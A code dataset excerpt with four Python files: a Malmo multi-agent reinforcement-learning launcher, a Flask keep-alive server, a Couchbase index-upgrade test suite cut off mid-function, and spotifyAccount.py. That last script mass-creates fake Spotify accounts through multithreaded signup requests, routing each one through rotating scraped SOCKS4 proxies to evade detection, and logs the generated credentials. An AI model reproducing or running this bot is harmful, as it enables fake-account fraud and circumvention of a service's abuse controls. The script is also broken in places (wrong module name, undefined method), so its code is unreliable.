source
stringlengths 3
86
| python
stringlengths 75
1.04M
|
|---|---|
run_multi_agent.py
|
import os
from argparse import ArgumentParser
from multiprocessing import Process, active_children
from time import sleep
from common import parse_clients_args
from missions.multi_agent import MultiAgent
def agent_factory(name, role, clients, agent_type, steps, mission, mode):
from missions.multi_agent import MultiAgentEnvironment, MultiAgentStateBuilder
from malmo_rl.agents.abstract_agent import AbstractAgent
clients = parse_clients_args(clients)
recording_dir = 'records/{}'.format(mission.mission_name)
if not os.path.exists(recording_dir):
os.makedirs(recording_dir)
recording_path = os.path.join(recording_dir, '{}.tgz'.format(name))
state_builder = MultiAgentStateBuilder()
env = MultiAgentEnvironment(mission.mission_name, mission.mission_xml, clients, state_builder,
role=role, recording_path=recording_path)
if 'Observer' in name:
agent_type = 'observer'
agent = AbstractAgent(name, env, agent_type)
print(name + ' initialized.')
weights_filename = 'weights/{}/{}_{}'.format(mission.mission_name, agent_type, name)
if mode == 'training':
agent.fit(env, steps)
agent.save(weights_filename)
else:
agent.load(weights_filename)
agent.test(env, nb_episodes=10)
def run_experiment(agents_def):
assert len(agents_def) >= 1, 'Not enough agents (required: >= 1, got: %d)' \
% len(agents_def)
for agent in agents_def:
p = Process(target=agent_factory, kwargs=agent)
p.daemon = True
p.start()
try:
# wait until all agents are finished
while len(active_children()) > 0:
sleep(0.1)
except KeyboardInterrupt:
print('Caught control-c - shutting down.')
if __name__ == '__main__':
arg_parser = ArgumentParser('Malmo experiment')
arg_parser.add_argument('--ms-per-tick', type=int, default=50,
help='Malmo running speed')
arg_parser.add_argument('--clients', default='clients.txt',
help='.txt file with client(s) IP addresses')
arg_parser.add_argument('--steps', type=int, default=1000000,
help='Number of steps to train for')
arg_parser.add_argument('--agents', default='random random observer', nargs='+',
help='Agent(s) to use (default is 2 Random agents and an Observer)')
arg_parser.add_argument('--mode', default='training',
help='Training or testing mode')
args = arg_parser.parse_args()
ms_per_tick = args.ms_per_tick
clients = args.clients
steps = args.steps
agents = args.agents
mode = args.mode
mission = MultiAgent(ms_per_tick)
mission_agent_names = mission.agent_names
assert len(agents) == len(mission_agent_names), '1 agent must be specified for each mission agent name'
clients = open(clients, 'r').read().splitlines()
print('Clients: {}'.format(clients))
assert len(clients) >= len(mission_agent_names), '1 Malmo client for each agent must be specified in clients.txt'
# Setup agents
agents_def = [{'name': agent_name, 'role': idx, 'clients': clients, 'agent_type': agents[idx], 'steps': steps,
'mission': mission, 'mode': mode}
for idx, agent_name in enumerate(mission_agent_names)]
run_experiment(agents_def)
|
spotifyAccount.py
|
import platform
import random
import string
import threading
import request
import time
from os import system
if platform.system() == "Linux":
title = "Linux"
elif platform.system() == "Windows":
title = "Windows"
else:
title = "Mac OsX"
def setRandomName(size = 10, chars = string.ascii_letters + string.digits):
return ''.join(random.choice(chars) for i in range(size))
def randomPassword(size = 14, chars = string.ascii_letters + string.digits):
return ''.join(random.choice(chars) for i in range(size))
global maxi
global created
created = 0
errors = 0
class proxy:
def update(self):
while True:
data = ''
urls = ["https://api.proxyscrape.com/?request=getproxies&proxytype=socks4&timeout=10000&ssl=yes"]
for url in urls:
data += request.get(url).text
self.splited += data.split("\r\n") #scrapping proxy
time.sleep(600)
def getProxy(self):
random1 = random.choice(self.splited)
return random1
def FormatProxy(self):
proxyOutput = {'https' :'socks4://'+self.get_proxy()}
return proxyOutput
def __init__(self):
self.splited = []
threading.Thread(target = self.update).start()
time.sleep(3)
proxy1 = proxy()
def creator():
global maxi
global created
global errors
while maxi > created:
if title == "Linux":
system("Spotify Account Created: {created}/{maxi} Errors:{errors}".format(created = created, maxi = maxi, errors = errors))
s = request.session()
email = setRandomName()
password = randomPassword()
data = {
"displayname":"Josh",
"creation_point":"https://login.app.spotify.com?utm_source=spotify&utm_medium=desktop-win32&utm_campaign=organic",
"birth_month":"12",
"email":email + "@gmail.com",
"password":password,
"creation_flow":"desktop",
"platform":"desktop",
"birth_year":"1991",
"iagree":"1",
"key":"4c7a36d5260abca4af282779720cf631",
"birth_day":"17",
"gender":"male",
"password_repeat":password,
"referrer":""
}
try:
r = s.post("https://spclient.wg.spotify.com/signup/public/v1/account/",data=data,proxies=proxy1.FormatProxy())
if '{"status":1,"' in r.text:
open("created.txt","a+").write(email + "@gmail.com:" + password + "\n")
created += 1
if title == "Linux":
system("title "+ f"Spotify account creator: {created}/{maxi} Errors:{errors}")
elif title == "Windows":
system("title "+ f"Spotify account creator: {created}/{maxi} Errors:{errors}")
else:
errors += 1
except:
pass
maxi = int(input("how many account do you want created ? \n"))
maxThreads = int(input("how many threads ? \n"))
num = 0
while num < maxThreads:
num += 1
threading.Thread(target=creator).start()
|
keep_alive.py
|
from flask import Flask, render_template
from threading import Thread
app = Flask('')
@app.route('/')
def home():
return "Online!"
def run():
app.run(host='0.0.0.0',port=8080)
def keep_alive():
t = Thread(target=run)
t.start()
|
upgrade_gsi.py
|
import copy
import logging
from datetime import datetime
from threading import Thread
from .base_gsi import BaseSecondaryIndexingTests
from couchbase_helper.query_definitions import QueryDefinition
from membase.helper.bucket_helper import BucketOperationHelper
from newupgradebasetest import NewUpgradeBaseTest
from remote.remote_util import RemoteMachineShellConnection
from membase.api.rest_client import RestConnection, RestHelper
log = logging.getLogger(__name__)
QUERY_TEMPLATE = "SELECT {0} FROM %s "
class UpgradeSecondaryIndex(BaseSecondaryIndexingTests, NewUpgradeBaseTest):
def setUp(self):
super(UpgradeSecondaryIndex, self).setUp()
self.initial_build_type = self.input.param('initial_build_type', None)
self.upgrade_build_type = self.input.param('upgrade_build_type', self.initial_build_type)
self.disable_plasma_upgrade = self.input.param("disable_plasma_upgrade", False)
self.rebalance_empty_node = self.input.param("rebalance_empty_node", True)
self.num_plasma_buckets = self.input.param("standard_buckets", 1)
self.initial_version = self.input.param('initial_version', '4.6.0-3653')
self.post_upgrade_gsi_type = self.input.param('post_upgrade_gsi_type', 'memory_optimized')
self.upgrade_to = self.input.param("upgrade_to")
self.index_batch_size = self.input.param("index_batch_size", -1)
self.toggle_disable_upgrade = self.input.param("toggle_disable_upgrade", False)
query_template = QUERY_TEMPLATE
query_template = query_template.format("job_title")
self.whereCondition= self.input.param("whereCondition", " job_title != \"Sales\" ")
query_template += " WHERE {0}".format(self.whereCondition)
self.load_query_definitions = []
self.initial_index_number = self.input.param("initial_index_number", 1)
for x in range(self.initial_index_number):
index_name = "index_name_" + str(x)
query_definition = QueryDefinition(index_name=index_name, index_fields=["job_title"],
query_template=query_template, groups=["simple"])
self.load_query_definitions.append(query_definition)
if not self.build_index_after_create:
self.build_index_after_create = True
self.multi_create_index(buckets = self.buckets,
query_definitions = self.load_query_definitions)
self.build_index_after_create = False
else:
self.multi_create_index(buckets = self.buckets,
query_definitions=self.load_query_definitions)
self.skip_metabucket_check = True
def tearDown(self):
self.upgrade_servers = self.servers
super(UpgradeSecondaryIndex, self).tearDown()
def test_offline_upgrade(self):
"""
Offline Upgrade.
1) Perform Operations
2) Stop cb service on all nodes.
3) Upgrade all nodes.
4) Start cb service on all nodes.
5) Perform Operations
"""
# Perform pre_upgrade operations on cluster
before_tasks = self.async_run_operations(buckets=self.buckets,
phase="before")
self._run_tasks([before_tasks])
prepare_statements = self._create_prepare_statement()
for server in self.servers:
remote = RemoteMachineShellConnection(server)
remote.stop_server()
remote.disconnect()
self.upgrade_servers.append(server)
upgrade_threads = self._async_update(self.upgrade_to, self.servers)
for upgrade_thread in upgrade_threads:
upgrade_thread.join()
self.add_built_in_server_user()
ops_map = self.generate_operation_map("before")
if "create_index" in ops_map and not self.build_index_after_create:
index_name_list = []
for query_definition in self.query_definitions:
index_name_list.append(query_definition.index_name)
build_index_tasks = []
for bucket in self.buckets:
build_index_tasks.append(self.async_build_index(
bucket, index_name_list))
self._run_tasks([build_index_tasks])
self.sleep(20)
kv_ops = self.kv_mutations()
for kv_op in kv_ops:
kv_op.result()
nodes = self.get_nodes_from_services_map(service_type="index",
get_all_nodes=True)
for node in nodes:
self._verify_indexer_storage_mode(node)
self.multi_query_using_index(buckets=self.buckets, query_definitions=self.load_query_definitions)
try:
self._execute_prepare_statement(prepare_statements)
except Exception as ex:
msg = "No such prepared statement"
self.assertIn(msg, str(ex), str(ex))
self._verify_index_partitioning()
def test_online_upgrade(self):
services_in = []
before_tasks = self.async_run_operations(buckets=self.buckets, phase="before")
server_out = self.nodes_out_list
self._run_tasks([before_tasks])
in_between_tasks = self.async_run_operations(buckets=self.buckets, phase="in_between")
kv_ops = self.kv_mutations()
log.info("Upgrading servers to {0}...".format(self.upgrade_to))
rebalance = self.cluster.async_rebalance(self.servers[:self.nodes_init], [], self.nodes_out_list)
rebalance.result()
self.upgrade_servers = self.nodes_out_list
upgrade_th = self._async_update(self.upgrade_to, server_out)
for th in upgrade_th:
th.join()
log.info("==== Upgrade Complete ====")
self.sleep(120)
node_version = RestConnection(server_out[0]).get_nodes_versions()
for service in list(self.services_map.keys()):
for node in self.nodes_out_list:
node = "{0}:{1}".format(node.ip, node.port)
if node in self.services_map[service]:
services_in.append(service)
rebalance = self.cluster.async_rebalance(self.servers[:self.nodes_init],
self.nodes_out_list, [],
services=services_in)
rebalance.result()
self._run_tasks([kv_ops, in_between_tasks])
self.sleep(60)
log.info("Upgraded to: {0}".format(node_version))
nodes_out = []
for service in self.nodes_out_dist.split("-"):
nodes_out.append(service.split(":")[0])
if "index" in nodes_out or "n1ql" in nodes_out:
self._verify_bucket_count_with_index_count(query_definitions=self.load_query_definitions)
else:
self._verify_bucket_count_with_index_count()
after_tasks = self.async_run_operations(buckets=self.buckets, phase="after")
self.sleep(180)
self._run_tasks([after_tasks])
def test_online_upgrade_swap_rebalance(self):
"""
:return:
"""
before_tasks = self.async_run_operations(buckets=self.buckets, phase="before")
self._run_tasks([before_tasks])
self._install(self.nodes_in_list, version=self.upgrade_to)
in_between_tasks = self.async_run_operations(buckets=self.buckets, phase="in_between")
kv_ops = self.kv_mutations()
log.info("Swapping servers...")
rebalance = self.cluster.async_rebalance(self.servers[:self.nodes_init],
self.nodes_in_list,
self.nodes_out_list)
rebalance.result()
log.info("===== Nodes Swapped with Upgraded versions =====")
self.upgrade_servers = self.nodes_in_list
self._run_tasks([kv_ops, in_between_tasks])
self.sleep(60)
nodes_out = []
for service in self.nodes_out_dist.split("-"):
nodes_out.append(service.split(":")[0])
if "index" in nodes_out or "n1ql" in nodes_out:
self._verify_bucket_count_with_index_count(query_definitions=self.load_query_definitions)
else:
self._verify_bucket_count_with_index_count()
after_tasks = self.async_run_operations(buckets=self.buckets, phase="after")
self.sleep(180)
self._run_tasks([after_tasks])
def test_online_upgrade_with_rebalance(self):
before_tasks = self.async_run_operations(buckets=self.buckets,
phase="before")
self._run_tasks([before_tasks])
community_to_enterprise = (self.upgrade_build_type == "enterprise" and self.initial_build_type == "community")
self._install(self.nodes_in_list, version=self.upgrade_to, community_to_enterprise=community_to_enterprise)
for i in range(len(self.nodes_out_list)):
node = self.nodes_out_list[i]
node_rest = RestConnection(node)
node_info = "{0}:{1}".format(node.ip, node.port)
node_services_list = node_rest.get_nodes_services()[node_info]
node_services = [",".join(node_services_list)]
active_nodes = []
for active_node in self.servers:
if active_node.ip != node.ip:
active_nodes.append(active_node)
in_between_tasks = self.async_run_operations(buckets=self.buckets,
phase="in_between")
kv_ops = self.kv_mutations()
if "index" in node_services_list:
self._create_equivalent_indexes(node)
if "n1ql" in node_services_list:
n1ql_nodes = self.get_nodes_from_services_map(service_type="n1ql",
get_all_nodes=True)
if len(n1ql_nodes) > 1:
for n1ql_node in n1ql_nodes:
if node.ip != n1ql_node.ip:
self.n1ql_node = n1ql_node
break
rebalance = self.cluster.async_rebalance(active_nodes,
[self.nodes_in_list[i]], [],
services=node_services)
rebalance.result()
log.info("===== Node Rebalanced In with Upgraded version =====")
self._run_tasks([kv_ops, in_between_tasks])
rebalance = self.cluster.async_rebalance(active_nodes, [], [node])
rebalance.result()
if "index" in node_services_list:
self.disable_upgrade_to_plasma(self.nodes_in_list[i])
self._recreate_equivalent_indexes(self.nodes_in_list[i])
self.sleep(60)
self._verify_indexer_storage_mode(self.nodes_in_list[i])
self._verify_bucket_count_with_index_count()
self.multi_query_using_index()
if self.toggle_disable_upgrade:
self.disable_plasma_upgrade = not self.toggle_disable_upgrade
after_tasks = self.async_run_operations(buckets=self.buckets, phase="after")
self._run_tasks([after_tasks])
def test_online_upgrade_with_failover(self):
before_tasks = self.async_run_operations(buckets=self.buckets,
phase="before")
self._run_tasks([before_tasks])
prepare_statements = self._create_prepare_statement()
if self.rebalance_empty_node:
self._install(self.nodes_in_list, version=self.upgrade_to)
rebalance = self.cluster.async_rebalance(self.servers[:self.nodes_init],
[self.nodes_in_list[0]], [],
services=["index"])
rebalance.result()
for i in range(len(self.nodes_out_list)):
if self.rebalance_empty_node:
self.disable_upgrade_to_plasma(self.nodes_in_list[0])
self.set_batch_size(self.nodes_in_list[0], self.index_batch_size)
node = self.nodes_out_list[i]
node_rest = RestConnection(node)
node_info = "{0}:{1}".format(node.ip, node.port)
node_services_list = node_rest.get_nodes_services()[node_info]
node_services = [",".join(node_services_list)]
active_nodes = []
for active_node in self.servers:
if active_node.ip != node.ip:
active_nodes.append(active_node)
in_between_tasks = self.async_run_operations(buckets=self.buckets,
phase="in_between")
kv_ops = self.kv_mutations()
if "index" in node_services_list:
if self.initial_version < "5":
self._create_equivalent_indexes(node)
if "n1ql" in node_services_list:
n1ql_nodes = self.get_nodes_from_services_map(service_type="n1ql",
get_all_nodes=True)
if len(n1ql_nodes) > 1:
for n1ql_node in n1ql_nodes:
if node.ip != n1ql_node.ip:
self.n1ql_node = n1ql_node
break
failover_task = self.cluster.async_failover(
[self.master],
failover_nodes=[node],
graceful=False)
failover_task.result()
log.info("Node Failed over...")
upgrade_th = self._async_update(self.upgrade_to, [node])
for th in upgrade_th:
th.join()
log.info("==== Upgrade Complete ====")
self.sleep(120)
rest = RestConnection(self.master)
nodes_all = rest.node_statuses()
for cluster_node in nodes_all:
if cluster_node.ip == node.ip:
log.info("Adding Back: {0}".format(node))
rest.add_back_node(cluster_node.id)
rest.set_recovery_type(otpNode=cluster_node.id,
recoveryType="full")
log.info("Adding node back to cluster...")
rebalance = self.cluster.async_rebalance(active_nodes, [], [])
rebalance.result()
self._run_tasks([kv_ops, in_between_tasks])
ops_map = self.generate_operation_map("before")
if "index" in node_services:
if self.initial_version < "5":
self._remove_equivalent_indexes(node)
self.sleep(60)
self._verify_indexer_storage_mode(node)
self._verify_throttling(node)
self.wait_until_indexes_online()
if self.index_batch_size != 0:
count = 0
verify_items = False
while count < 15 and not verify_items:
try:
self._verify_bucket_count_with_index_count()
verify_items = True
except Exception as e:
msg = "All Items didn't get Indexed"
if msg in str(e) and count < 15:
count += 1
self.sleep(20)
else:
raise e
self.multi_query_using_index()
self._execute_prepare_statement(prepare_statements)
if self.toggle_disable_upgrade:
self.disable_plasma_upgrade = not self.disable_plasma_upgrade
def test_online_upgrade_with_rebalance_failover(self):
nodes_out_list = copy.deepcopy(self.nodes_out_list)
self.nodes_out_list = []
self.nodes_out_list.append(nodes_out_list[0])
self.test_online_upgrade_with_rebalance()
self.multi_drop_index()
if self.toggle_disable_upgrade:
self.disable_plasma_upgrade = not self.toggle_disable_upgrade
self.nodes_out_list.append(nodes_out_list[1])
self.test_online_upgrade_with_failover()
def test_downgrade_plasma_to_fdb_failover(self):
before_tasks = self.async_run_operations(buckets=self.buckets,
phase="before")
self._run_tasks([before_tasks])
for server in self.servers:
remote = RemoteMachineShellConnection(server)
remote.stop_server()
remote.disconnect()
self.upgrade_servers.append(server)
upgrade_threads = self._async_update(self.upgrade_to, self.servers)
for upgrade_thread in upgrade_threads:
upgrade_thread.join()
self.sleep(120)
self.add_built_in_server_user()
indexer_node = self.get_nodes_from_services_map(service_type="index")
rest = RestConnection(indexer_node)
rest.set_downgrade_storage_mode_with_rest(self.disable_plasma_upgrade)
failover_task = self.cluster.async_failover(
[self.master],
failover_nodes=[indexer_node],
graceful=False)
failover_task.result()
log.info("Node Failed over...")
rest = RestConnection(self.master)
nodes_all = rest.node_statuses()
for cluster_node in nodes_all:
if cluster_node.ip == indexer_node.ip:
log.info("Adding Back: {0}".format(indexer_node))
rest.add_back_node(cluster_node.id)
rest.set_recovery_type(otpNode=cluster_node.id,
recoveryType="full")
log.info("Adding node back to cluster...")
rebalance = self.cluster.async_rebalance(self.servers[:self.nodes_init], [], [])
rebalance.result()
self.sleep(20)
self._verify_indexer_storage_mode(indexer_node)
self.multi_query_using_index()
def test_downgrade_plasma_to_fdb_rebalance(self):
before_tasks = self.async_run_operations(buckets=self.buckets,
phase="before")
self._run_tasks([before_tasks])
for server in self.servers:
remote = RemoteMachineShellConnection(server)
remote.stop_server()
remote.disconnect()
self.upgrade_servers.append(server)
upgrade_threads = self._async_update(self.upgrade_to, self.servers)
for upgrade_thread in upgrade_threads:
upgrade_thread.join()
self.sleep(120)
self.add_built_in_server_user()
for indexer_node in self.nodes_in_list:
rebalance = self.cluster.async_rebalance(self.servers[:self.nodes_init],
[indexer_node], [],
services=["index"])
rebalance.result()
rest = RestConnection(indexer_node)
rest.set_downgrade_storage_mode_with_rest(self.disable_plasma_upgrade)
deploy_node_info = ["{0}:{1}".format(indexer_node.ip,
indexer_node.port)]
for bucket in self.buckets:
for query_definition in self.query_definitions:
query_definition.index_name = query_definition.index_name + "_replica"
self.create_index(bucket=bucket, query_definition=query_definition,
deploy_node_info=deploy_node_info)
self.sleep(20)
self._verify_indexer_storage_mode(indexer_node)
self.multi_query_using_index()
self._remove_equivalent_indexes(indexer_node)
self.disable_plasma_upgrade = not self.disable_plasma_upgrade
def test_upgrade_with_memdb(self):
"""
Keep N1ql node on one of the kv nodes
:return:
"""
self.set_circular_compaction = self.input.param("set_circular_compaction", False)
kv_nodes = self.get_nodes_from_services_map(service_type="kv", get_all_nodes=True)
log.info("Upgrading all kv nodes...")
for node in kv_nodes:
log.info("Rebalancing kv node {0} out to upgrade...".format(node.ip))
rebalance = self.cluster.async_rebalance(self.servers[:self.nodes_init], [],
[node])
rebalance.result()
self.servers.remove(node)
upgrade_th = self._async_update(self.upgrade_to, [node])
for th in upgrade_th:
th.join()
self.sleep(120)
log.info("Rebalancing kv node {0} in after upgrade...".format(node.ip))
rebalance = self.cluster.async_rebalance(self.servers[:self.nodes_init],
[node], [],
services=['kv'])
self.servers.insert(0, node)
rebalance.result()
log.info("===== KV Nodes Upgrade Complete =====")
log.info("Upgrading all query nodes...")
query_nodes = self.get_nodes_from_services_map(service_type="n1ql", get_all_nodes=True)
log.info("Rebalancing query nodes out to upgrade...")
rebalance = self.cluster.async_rebalance(self.servers[:self.nodes_init], [],
query_nodes)
rebalance.result()
upgrade_th = self._async_update(self.upgrade_to, query_nodes)
for th in upgrade_th:
th.join()
self.sleep(120)
services_in = ["n1ql" for x in range(len(query_nodes))]
log.info("Rebalancing query nodes in after upgrade...")
rebalance = self.cluster.async_rebalance(self.servers[:self.nodes_init],
query_nodes, [],
services=services_in)
rebalance.result()
log.info("===== Query Nodes Upgrade Complete =====")
kv_ops = self.kv_mutations()
log.info("Upgrading all index nodes...")
index_nodes = self.get_nodes_from_services_map(service_type="index", get_all_nodes=True)
log.info("Rebalancing index nodes out to upgrade...")
rebalance = self.cluster.async_rebalance(self.servers[:self.nodes_init], [],
index_nodes)
rebalance.result()
upgrade_th = self._async_update(self.upgrade_to, index_nodes)
self.sleep(120)
rest = RestConnection(self.master)
log.info("Setting indexer storage mode to {0}...".format(self.post_upgrade_gsi_type))
status = rest.set_indexer_storage_mode(storageMode=self.post_upgrade_gsi_type)
if status:
log.info("====== Indexer Mode Set to {0}=====".format(self.post_upgrade_gsi_type))
else:
self.info("====== Indexer Mode is not set to {0}=====".format(self.post_upgrade_gsi_type))
for th in upgrade_th:
th.join()
self._run_tasks([kv_ops])
log.info("===== Index Nodes Upgrade Complete =====")
services_in = ["index" for x in range(len(index_nodes))]
log.info("Rebalancing index nodes in after upgrade...")
rebalance = self.cluster.async_rebalance(self.servers[:self.nodes_init],
index_nodes, [],
services=services_in)
rebalance.result()
self.sleep(60)
if self.set_circular_compaction:
DAYS = ["Monday", "Tuesday", "Wednesday", "Thursday", "Friday", "Saturday", "Sunday"]
servers = self.get_nodes_from_services_map(service_type="index", get_all_nodes=True)
rest = RestConnection(servers[0])
date = datetime.now()
dayOfWeek = (date.weekday() + (date.hour+((date.minute+5)//60))//24)%7
status, content, header = rest.set_indexer_compaction(indexDayOfWeek=DAYS[dayOfWeek],
indexFromHour=date.hour+((date.minute+1)//60),
indexFromMinute=(date.minute+1)%60)
self.assertTrue(status, "Error in setting Circular Compaction... {0}".format(content))
self.multi_create_index(self.buckets, self.query_definitions)
self._verify_bucket_count_with_index_count()
self.multi_query_using_index(self.buckets, self.query_definitions)
def test_online_upgrade_path_with_rebalance(self):
pre_upgrade_tasks = self.async_run_operations(phase="before")
self._run_tasks([pre_upgrade_tasks])
threads = [Thread(target=self._async_continuous_queries, name="run_query")]
kvOps_tasks = self.async_run_doc_ops()
for thread in threads:
thread.start()
self.nodes_upgrade_path = self.input.param("nodes_upgrade_path", "").split("-")
for service in self.nodes_upgrade_path:
nodes = self.get_nodes_from_services_map(service_type=service, get_all_nodes=True)
log.info("----- Upgrading all {0} nodes -----".format(service))
for node in nodes:
node_rest = RestConnection(node)
node_info = "{0}:{1}".format(node.ip, node.port)
node_services_list = node_rest.get_nodes_services()[node_info]
node_services = [",".join(node_services_list)]
if "index" in node_services_list:
if len(nodes) == 1:
threads = []
else:
self._create_equivalent_indexes(node)
if "n1ql" in node_services_list:
if len(nodes) > 1:
for n1ql_node in nodes:
if node.ip != n1ql_node.ip:
self.n1ql_node = n1ql_node
break
log.info("Rebalancing the node out...")
rebalance = self.cluster.async_rebalance(self.servers[:self.nodes_init], [], [node])
rebalance.result()
active_nodes = []
for active_node in self.servers:
if active_node.ip != node.ip:
active_nodes.append(active_node)
log.info("Upgrading the node...")
upgrade_th = self._async_update(self.upgrade_to, [node])
for th in upgrade_th:
th.join()
self.sleep(120)
log.info("==== Upgrade Complete ====")
log.info("Adding node back to cluster...")
rebalance = self.cluster.async_rebalance(active_nodes,
[node], [],
services=node_services)
rebalance.result()
self.sleep(100)
node_version = RestConnection(node).get_nodes_versions()
log.info("{0} node {1} Upgraded to: {2}".format(service, node.ip, node_version))
ops_map = self.generate_operation_map("in_between")
if not "drop_index" in ops_map:
if "index" in node_services_list:
self._recreate_equivalent_indexes(node)
else:
self.multi_create_index()
self._verify_scan_api()
self._create_replica_indexes()
self.multi_query_using_index(verify_results=False)
if "create_index" in ops_map:
for bucket in self.buckets:
for query_definition in self.query_definitions:
self.drop_index(bucket.name, query_definition)
self._run_tasks([kvOps_tasks])
for thread in threads:
thread.join()
self.sleep(60)
self._verify_create_index_api()
buckets = self._create_plasma_buckets()
self.load(self.gens_load, buckets=buckets, flag=self.item_flag, batch_size=self.batch_size)
self.multi_create_index(buckets=buckets, query_definitions=self.query_definitions)
self.multi_query_using_index(buckets=buckets, query_definitions=self.query_definitions)
self._verify_gsi_rebalance()
self._verify_index_partitioning()
def kv_mutations(self, docs=None):
if not docs:
docs = self.docs_per_day
gens_load = self.generate_docs(docs)
tasks = self.async_load(generators_load=gens_load, batch_size=self.batch_size)
return tasks
def _run_tasks(self, tasks_list):
for tasks in tasks_list:
for task in tasks:
task.result()
def _verify_create_index_api(self):
"""
1. Get Indexer and Query Versions
2. Run create query with explain
3. Verify the api returned
:return:
"""
old_api = False
node_map = self._get_nodes_with_version()
log.info(node_map)
for node, vals in node_map.items():
if vals["version"] < "5":
old_api = True
break
create_index_query_age = "CREATE INDEX verify_api ON default(age DESC)"
try:
query_result = self.n1ql_helper.run_cbq_query(query=create_index_query_age,
server=self.n1ql_node)
except Exception as ex:
if old_api:
msgs = ["'syntax error - at DESC'",
"This option is enabled after cluster is fully upgraded and there is no failed node"]
desc_error_hit = False
for msg in msgs:
if msg in str(ex):
desc_error_hit = True
break
if not desc_error_hit:
log.info(str(ex))
raise
else:
log.info(str(ex))
raise
def _verify_scan_api(self):
"""
1. Get Indexer and Query Versions
2. Run create query with explain
3. Verify the api returned
:return:
"""
node_map = self._get_nodes_with_version()
for query_definition in self.query_definitions:
query = query_definition.generate_query_with_explain(bucket=self.buckets[0])
actual_result = self.n1ql_helper.run_cbq_query(query=query, server=self.n1ql_node)
log.info(actual_result)
old_api = False
api_two = False
for node, vals in node_map.items():
if vals["version"] < "5":
old_api = True
break
elif vals["version"] < "5.5":
api_two = True
if not old_api and api_two:
msg = "IndexScan2"
self.assertIn(msg, str(actual_result), "IndexScan2 is not used for Spock Nodes")
elif not old_api and not api_two:
msg = "IndexScan3"
self.assertIn(msg, str(actual_result), "IndexScan3 is not used for Vulcan Nodes")
def _create_replica_indexes(self):
nodes = self.get_nodes_from_services_map(service_type="index", get_all_nodes=True)
create_index_query = "CREATE INDEX index_replica_index ON default(age) USING GSI WITH {{'num_replica': {0}}};".format(len(nodes)-1)
try:
query_result = self.n1ql_helper.run_cbq_query(query=create_index_query,
server=self.n1ql_node)
except Exception as ex:
old_api = False
node_map = self._get_nodes_with_version()
log.info(node_map)
for node, vals in node_map.items():
if vals["version"] < "5":
old_api = True
msg = "Fails to create index with replica"
if msg in str(ex):
break
if not old_api:
log.info(str(ex))
raise
else:
drop_index_query = "DROP INDEX default.index_replica_index"
query_result = self.n1ql_helper.run_cbq_query(query=drop_index_query,
server=self.n1ql_node)
def _recreate_equivalent_indexes(self, index_node):
node_map = self._get_nodes_with_version()
for node, vals in node_map.items():
if vals["version"] < "5":
rest = RestConnection(self.master)
index_map = rest.get_index_status()
log.info(index_map)
lost_indexes = {}
for bucket, index in index_map.items():
for index, vals in index.items():
if "_replica" in index:
if not index in list(lost_indexes.keys()):
lost_indexes[index] = []
lost_indexes[index].append(bucket)
deploy_node_info = ["{0}:{1}".format(index_node.ip, index_node.port)]
for index, buckets in lost_indexes.items():
for query_definition in self.query_definitions:
if query_definition.index_name == index:
query_definition.index_name = query_definition.index_name.split("_replica")[0]
for bucket in buckets:
bucket = [x for x in self.buckets if x.name == bucket][0]
self.create_index(bucket=bucket,
query_definition=query_definition,
deploy_node_info=deploy_node_info)
self.sleep(20)
query_definition.index_name = index
for bucket in buckets:
bucket = [x for x in self.buckets if x.name == bucket][0]
self.drop_index(bucket, query_definition)
self.sleep(20)
query_definition.index_name = query_definition.index_name.split("_replica")[0]
def _remove_equivalent_indexes(self, index_node):
node_map = self._get_nodes_with_version()
for node, vals in node_map.items():
if vals["version"] > "5":
rest = RestConnection(self.master)
index_map = rest.get_index_status()
log.info(index_map)
for query_definition in self.query_definitions:
if "_replica" in query_definition.index_name:
for bucket in self.buckets:
self.drop_index(bucket, query_definition)
self.sleep(20)
query_definition.index_name = query_definition.index_name.split("_replica")[0]
def _create_equivalent_indexes(self, index_node):
node_map = self._get_nodes_with_version()
for node, vals in node_map.items():
if vals["version"] < "5":
index_nodes = self.get_nodes_from_services_map(service_type="index",
get_all_nodes=True)
index_nodes = [x for x in index_nodes if x.ip != index_node.ip]
if index_nodes:
ops_map = self.generate_operation_map("in_between")
if "create_index" not in ops_map:
lost_indexes = self._find_index_lost_when_indexer_down(index_node)
deploy_node_info = ["{0}:{1}".format(index_nodes[0].ip,
index_nodes[0].port)]
for index, buckets in lost_indexes.items():
for query_definition in self.query_definitions:
if query_definition.index_name == index:
query_definition.index_name = query_definition.index_name + "_replica"
for bucket in buckets:
bucket = [x for x in self.buckets if x.name == bucket][0]
self.create_index(bucket=bucket,
query_definition=query_definition,
deploy_node_info=deploy_node_info)
self.sleep(20)
def _find_index_lost_when_indexer_down(self, index_node):
lost_indexes = {}
rest = RestConnection(self.master)
index_map = rest.get_index_status()
log.info("index_map: {0}".format(index_map))
host = "{0}:8091".format(index_node.ip)
for bucket, index in index_map.items():
for index, vals in index.items():
if vals["hosts"] == host:
if not index in list(lost_indexes.keys()):
lost_indexes[index] = []
lost_indexes[index].append(bucket)
log.info("Lost Indexes: {0}".format(lost_indexes))
return lost_indexes
def _get_nodes_with_version(self):
rest_conn = RestConnection(self.master)
nodes = rest_conn.get_nodes()
map = {}
for cluster_node in nodes:
map[cluster_node.ip] = {"version": cluster_node.version,
"services": cluster_node.services}
return map
def _create_prepare_statement(self):
prepare_name_query = {}
for bucket in self.buckets:
prepare_name_query[bucket.name] = {}
for query_definition in self.query_definitions:
query = query_definition.generate_query(bucket=bucket)
name = "prepare_" + query_definition.index_name + bucket.name
query = "PREPARE " + name + " FROM " + query
result = self.n1ql_helper.run_cbq_query(query=query, server=self.n1ql_node)
self.assertEqual(result['status'], 'success', 'Query was not run successfully')
prepare_name_query[bucket.name][query_definition.index_name] = name
return prepare_name_query
def _execute_prepare_statement(self, prepare_name_query):
for bucket in self.buckets:
for query_definition in self.query_definitions:
prepared_query = "EXECUTE " + prepare_name_query[bucket.name][query_definition.index_name]
result = self.n1ql_helper.run_cbq_query(query=prepared_query, server=self.n1ql_node)
self.assertEqual(result['status'], 'success', 'Query was not run successfully')
def _async_continuous_queries(self):
tasks = []
for i in range(100):
mid_upgrade_tasks = self.async_run_operations(phase="in_between")
tasks.append(mid_upgrade_tasks)
self.sleep(10)
return tasks
def _create_plasma_buckets(self):
self.add_built_in_server_user()
for bucket in self.buckets:
if bucket.name.startswith("standard"):
BucketOperationHelper.delete_bucket_or_assert(
serverInfo=self.master, bucket=bucket.name)
self.buckets = [bu for bu in self.buckets if not bu.name.startswith("standard")]
buckets = []
for i in range(self.num_plasma_buckets):
name = "plasma_bucket_" + str(i)
buckets.append(name)
bucket_size = self._get_bucket_size(self.quota,
len(self.buckets)+len(buckets))
self._create_buckets(server=self.master, bucket_list=buckets,
